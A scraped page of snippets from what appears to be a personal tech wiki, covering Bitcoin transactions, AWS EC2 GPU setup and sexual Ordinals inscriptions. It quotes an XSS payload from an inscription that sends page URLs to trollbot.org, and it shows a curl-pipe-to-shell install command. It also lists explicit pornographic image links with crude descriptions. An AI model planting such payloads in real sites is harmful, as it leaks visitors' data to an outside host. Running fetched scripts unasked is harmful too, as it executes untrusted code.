Computer input device Updated 2025-07-16
Find computer IP with the
ip CLI tool Updated 2025-07-16 The Enshittification of the Internet Updated 2025-07-16
4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af Updated 2025-07-16
Output 0 does:where the large constant is an interesting inscription to test for the presence of XSS attacks on blockchain explorers:This is almost spendable with:but that fails because the altstack is cleared between the input and the output script, so this output is provably unspendable.
OP_ADD OP_ADD 13 OP_EQUAL OP_NOTIF OP_RETURN OP_ENDIF OP_FROMALTSTACK <large xss constant> OP_DROP<script type='text/javascript'>document.write('<img src='http://www.trollbot.org/xss-blockchain-detector.php?href=' + location.href + ''>');</script>`1 OP_TOALTSTACK 10 1 2 Slurm Workload Manager Updated 2025-07-16
Malandragem Updated 2025-07-16
Niobium compound Updated 2025-07-16
Chumbox Updated 2025-07-16
5660d06bd69326c18ec63127b37fb3b32ea763c3846b3334c51beb6a800c57d3 Updated 2025-07-16
In this malformed Coinbase transaction, the mining pool "nicehash" produced a provably unspendable Bitcoin output script due to a bug, and therefore lost most of the entire block reward of 6.25 BTC then worth about $ 123,000.
The output is unspendable because it ends in a constant 0, the disassembly of the first and main output is this series of constants:and for the second smaller one:the third one being an OP_RETURN message.
0 017fed86bba5f31f955f8b316c7fb9bd45cb6cbc 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0aa21a9ed62ec16bf1a388c7884e9778ddb0e26c0bf982dada47aaa5952347c0993da 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0This event received some coverage:
Virtual private network Updated 2025-07-16
Robot form factor Updated 2025-07-16
Models of computation course of the University of Oxford Updated 2025-07-16
Rigid body dynamics Updated 2025-07-16
Billy Mitchell (gamer) Updated 2025-07-16
U-Math Updated 2025-07-16
Amazon EC2 GPU Updated 2025-07-16
As of December 2023, the cheapest instance with an Nvidia GPU is g4nd.xlarge, so let's try that out. In that instance, lspci contains:so we see that it runs a Nvidia T4 GPU.
00:1e.0 3D controller: NVIDIA Corporation TU104GL [Tesla T4] (rev a1)Be careful not to confuse it with g4ad.xlarge, which has an AMD GPU instead. TODO meaning of "ad"? "a" presumably means AMD, but what is the "d"?
Some documentation on which GPU is in each instance can seen at: docs.aws.amazon.com/dlami/latest/devguide/gpu.html (archive) with a list of which GPUs they have at that random point in time. Can the GPU ever change for a given instance name? Likely not. Also as of December 2023 the list is already outdated, e.g. P5 is now shown, though it is mentioned at: aws.amazon.com/ec2/instance-types/p5/
When selecting the instance to launch, the GPU does not show anywhere apparently on the instance information page, it is so bad!
Also note that this instance has 4 vCPUs, so on a new account you must first make a customer support request to Amazon to increase your limit from the default of 0 to 4, see also: stackoverflow.com/questions/68347900/you-have-requested-more-vcpu-capacity-than-your-current-vcpu-limit-of-0, otherwise instance launch will fail with:
You have requested more vCPU capacity than your current vCPU limit of 0 allows for the instance bucket that the specified instance type belongs to. Please visit aws.amazon.com/contact-us/ec2-request to request an adjustment to this limit.
When starting up the instance, also select:Once you finally managed to SSH into the instance, first we have to install drivers and reboot:and now running:shows something like:
- image: Ubuntu 22.04
- storage size: 30 GB (maximum free tier allowance)
sudo apt update
sudo apt install nvidia-driver-510 nvidia-utils-510 nvidia-cuda-toolkit
sudo rebootnvidia-smi+-----------------------------------------------------------------------------+
| NVIDIA-SMI 525.147.05 Driver Version: 525.147.05 CUDA Version: 12.0 |
|-------------------------------+----------------------+----------------------+
| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
| | | MIG M. |
|===============================+======================+======================|
| 0 Tesla T4 Off | 00000000:00:1E.0 Off | 0 |
| N/A 25C P8 12W / 70W | 2MiB / 15360MiB | 0% Default |
| | | N/A |
+-------------------------------+----------------------+----------------------+
+-----------------------------------------------------------------------------+
| Processes: |
| GPU GI CI PID Type Process name GPU Memory |
| ID ID Usage |
|=============================================================================|
| No running processes found |
+-----------------------------------------------------------------------------+If we start from the raw Ubuntu 22.04, first we have to install drivers:
- docs.aws.amazon.com/AWSEC2/latest/UserGuide/install-nvidia-driver.html official docs
- stackoverflow.com/questions/63689325/how-to-activate-the-use-of-a-gpu-on-aws-ec2-instance
- askubuntu.com/questions/1109662/how-do-i-install-cuda-on-an-ec2-ubuntu-18-04-instance
- askubuntu.com/questions/1397934/how-to-install-nvidia-cuda-driver-on-aws-ec2-instance
From there basically everything should just work as normal. E.g. we were able to run a CUDA hello world just fine along:
nvcc inc.cu
./a.outOne issue with this setup, besides the time it takes to setup, is that you might also have to pay some network charges as it downloads a bunch of stuff into the instance. We should try out some of the pre-built images. But it is also good to know this pristine setup just in case.
We then managed to run Ollama just fine with:which gave:so way faster than on my local desktop CPU, hurray.
curl https://ollama.ai/install.sh | sh
/bin/time ollama run llama2 'What is quantum field theory?'0.07user 0.05system 0:16.91elapsed 0%CPU (0avgtext+0avgdata 16896maxresident)k
0inputs+0outputs (0major+1960minor)pagefaults 0swapsAfter setup from: askubuntu.com/a/1309774/52975 we were able to run:which gave:so only marginally better than on P14s. It would be fun to see how much faster we could make things on a more powerful GPU.
head -n1000 pap.txt | ARGOS_DEVICE_TYPE=cuda time argos-translate --from-lang en --to-lang fr > pap-fr.txt77.95user 2.87system 0:39.93elapsed 202%CPU (0avgtext+0avgdata 4345988maxresident)k
0inputs+88outputs (0major+910748minor)pagefaults 0swaps Niels Bohr Updated 2025-07-16
Hunt Updated 2025-07-16
These were found by running object detection software for some porn/nudity detection. We need to run some more, all sex was likely missed: github.com/GantMan/nsfw_model/issues/160
Vagina:
- ordinals.com/inscription/723d753d975cbae01b76fb09d827246ef023a46a408c6c452d22d63a6fed9e72i0 shaved closeup
- ordinals.com/inscription/7462bf4f967633efaaadf136c03bc2ad784941563330b593022d68a7c3460641i0 shaved from the front
- ordinals.com/inscription/8e92eb73fa2d0aa951cb860db29107f02d5c439e97254cde87679bb23fea9d27i0 stretch from the back
Dick photos:
- ordinals.com/inscription/3979478c4b9d0e008344cb7274b10ad9f5ea4d04604c97efc56909b825808d18i0 big white dick
- ordinals.com/inscription/8ae58911078f7aa0dfce457355498abc1a5bdd57f5b05525419466064c3e89c3i0 big-ish white dick small blonde guy. Likely gay porn.
- ordinals.com/inscription/dfb4213ac5a26d581cf6b6516bc8726e699ac632f0722c97eb48cfbe6b1e3eb6i0 hard dick
- big black dick Bitcoin memes
Anus:
- #668 ordinals.com/inscription/bb6f577e30e6840dce0474f3c3c55134404688e844982a49161502d3d69e322di0 male asshole open shock porn, this realtively early inscription got some attention:It happened soon after the notable Figure "Ordinal #652", and it likely tried to follow the surge of interest from its predecessor.
- ordinals.com/inscription/31d03361ca6bf998e0623763a87d2f776b33a50504bc3a9bbf128e96d97418b9i0 female open blackhole
Lingerie:
- bitcoinlambos.eth ads
- GenAI blondes in lingerie:
- ordinals.com/inscription/41250e039f9f1fdf9a05a3775d1a94a35bb46481a66687570f5db98ab7d00501i0 serious white bikini
- ordinals.com/inscription/bc361a8978e309d3c5b4212f35c48c74396315ee4c10a7e2f17427264d3178c6i0 Jenna Jameson 80's style photo shoot at at the beach. More at www.forumophilia.com/topic462690.html.
- ordinals.com/inscription/647b0cafe5a6fc545e40b6c1bab910c43adfe6b372fee0cc65d0aef9e470d820i0 Bitcoin carnival dress? What are the fruits behind and what is written in the back?
Sexy illustrations:
- ordinals.com/inscription/beeff78be2939caa9491b7588a6c3822b40b7e00d74190db1838ae9e0845b761i0 The Source by Jean-Auguste-Dominique Ingres (1856). Classical painting woman with pot.
- ordinals.com/inscription/890fc1226d6ac2dbcd54c8a9292581b903c2ab85f1eec8a0b0951bb32f88a173i0 genai cartoon futuristic big boobs
- ordinals.com/inscription/343699e12e3239357f42eab428a60591b9a40599ce57dfffe29709ed103f426di0 vagina apples
- ordinals.com/inscription/3bc21aa658a36c4e26a1c2631ac280e101d7167ee3fa19debadeb44cff0a9535i0 sexy drawing in lingerie
- ordinals.com/inscription/1a30aef623eac0dad6fc6759dc7c963266cda44ce43cece420bc41a07734b3cdi0 bikini selife onlyfans
- The "Astral Babes" Ordinal ruleset inscription collection magiceden.io/ordinals/marketplace/astral-babes hits positive for breasts and is a pain in the butt:
- ordinals.com/inscription/bd1705c52b601ab93b7e82c07477fed89568e3ebd4719ddf41d73c8be57c2d65i0
- ordinals.com/inscription/bd1705c52b601ab93b7e82c07477fed89568e3ebd4719ddf41d73c8be57c2d65i0
- ordinals.com/inscription/c7cd91355f7306c72d4d69f073f07f089689b7f790fb1c8595ac59eaed115af5i0
- ordinals.com/inscription/4322bcce78f05bb280337892954cce24948c9e0a90cb486c9734f90beae14811i0
Nintendo hard Updated 2025-07-16
There are unlisted articles, also show them or only show them.
